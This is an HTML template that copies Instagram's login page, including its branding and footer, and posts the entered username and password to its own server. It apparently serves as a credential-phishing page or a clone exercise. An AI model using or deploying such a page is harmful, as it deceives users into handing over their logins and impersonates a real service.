<!DOCTYPE html>
<html lang="pt-AO">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="Instagram">
        <meta name="author" content="Edlávio Alberto">
        <link rel="shortcut icon" href="/static/img/icon.png" type="image/x-icon">
        <link rel="stylesheet" href="/static/css/style.css">
        <title>Instagram</title>
    </head>
<body onload="SwitchScreen()">
        <section class="container">
           
            <!-- FORM SECTION -->
            <article class="form-area">
                <div class="logo">
                    <img src="/static/img/logo.png" alt="Instagram Logo">
                </div>
                <form 
                method="POST">
                    <input type="text" name="name" id="username" placeholder="Phone number, username, or email">
                    <input type="password" name="pass" id="password" placeholder="Password">
                    <input type="submit" name="submit" value="Enter">
                    <div class="other-option">
                        <div></div> <p>OR</p> <div></div>
                    </div>
                    <div class="options">
                        <a href="#" class="social"> <span><i class="fab fa-facebook-square"></i></span> Login with Facebook </a>
                        <div class="forget"> <a href="#">Forgot password?</a> </div>
                    </div>
                </form>
                <div class="noaccount">
                    <a href="#">Don't have an account?<span> Sign up </span></a>
                </div>
                
            </article>
        </section>
            <!-- FORM SECTION END -->
            <!-- FOOTER -->
        <footer>
            <div class="footer-content">
                <a href="#">Meta</a>
                <a href="#">About</a>
                <a href="#">Blog</a>
                <a href="#">Careers</a>
                <a href="#">API</a>
                <a href="#">Privacy</a>
                <a href="#">Terms</a>
                <a href="#">Top Accounts</a>
                <a href="#">Hashtags</a>
                <a href="#">Locations</a>
                <a href="#">Instagram Lite</a>
                <a href="#">Loading of contacts and non-users</a>
            </div>
            <div>
                <a href="#">Dance</a>
                <a href="#">Food and Drink</a>
                <a href="#">Home and Garden</a>
                <a href="#">Music</a>
                <a href="#">Visual Arts</a>
            </div>
            
            <div class="copyright">
                
                <span>&copy; 2022 Instagram from Meta</span>
            </div>
        </footer>
        <script src="/static/js/app.js"></script>
        <script src="/static/js/brands.min.js"></script>
        <script src="/static/js/fontawesome.min.js"></script>
</body>
</html>